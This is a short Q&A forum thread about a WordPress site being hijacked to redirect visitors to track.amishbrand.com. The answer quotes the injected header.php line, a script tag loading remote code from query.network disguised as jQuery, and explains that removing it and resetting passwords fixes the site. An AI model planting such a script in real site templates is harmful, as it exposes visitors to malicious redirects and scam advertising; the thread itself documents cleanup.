# Wordpress re-directs going to track.amishbrand.com

Tags: javascript, wordpress, redirect

My Wordpress site was re-directing to track.amishbrand.com - severely affecting performance of the website.

I am still unaware of its purpose, however, some other forums have suggested it can lead to false advertisements for users to upgrade their browser.

Answer (score 0):

Basically, somehow (to be figured out) my Wordpress header.php file was injected with the following line:

```
<script type="text/javascript" src="https://query.network/jquery"></script>
```

Removing the offending line (in header.php) via the editor (or FTP) removed the issue, however, it would be wise afterwards to update all passwords related to the account - both in Wordpress and related your account's FTP access.